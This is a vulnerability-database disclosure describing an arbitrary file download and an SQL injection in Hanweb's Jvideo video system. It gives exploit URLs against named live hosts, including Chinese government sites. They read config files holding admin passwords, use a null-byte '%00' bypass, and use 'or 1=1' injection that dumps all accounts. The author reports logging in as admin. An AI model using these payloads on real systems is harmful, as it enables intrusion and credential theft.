大汉Jvideo两处漏洞小合集(可能导致管理后台权限劫持)

基本字段

漏洞编号:
SSV-93856
披露/发现时间:
2014-05-12
提交时间:
2014-05-12
漏洞等级:
漏洞类别:
其他类型
影响组件:
JCMS(Hanweb)
漏洞作者:
wefgod
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

简要描述:

两处。

详细说明:

一个是任意文件下载,一个是sql注入。 先看任意文件下载吧,任意文件下载可以下载到setup的相关安装信息,从而可以登录setup目录的管理后台 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml

image001.png

来点好东西 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini

image002.png

可以看见setup下Admin的密码(屏蔽了),登录成功

image003.png

另外一个网站 http://www.yzwh.gov.cn/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini

image005.png

也可以看见setup下的admin的密码,登录成功

image006.png

如果遇到某些下载下来是空白的情况,可以试试下面这样: pathfile=/WEB-INF/ini/merpserver.ini%00.flv 可以绕过他们的防下载。

漏洞证明:

SQL就简单证明下了 网站1 正常页面: http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp

image008.png

用or测试,回显所有账号信息: http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89' or '1'='1'--&perm=&cPage=1&tiao=

image010.png

用and: http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89' and '1'='1'--&perm=&cPage=1&tiao=

image012.png

http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89'--&perm=&cPage=1&tiao= 可以用注释符:

image013.png

网站2 正常页面: http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp

image015.png

用and测试,木有问题正常回显搜索的账号: http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=zzz' and '1'='1'--&perm=&cPage=1&tiao=

image017.png

用or来测试,回显全部账号信息: http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=zzz' or '1'='1'--&perm=&cPage=1&tiao=

image019.png

由于网络有问题经常访问网站都是504,所以就不再用工具详细测试了。

共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 934
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负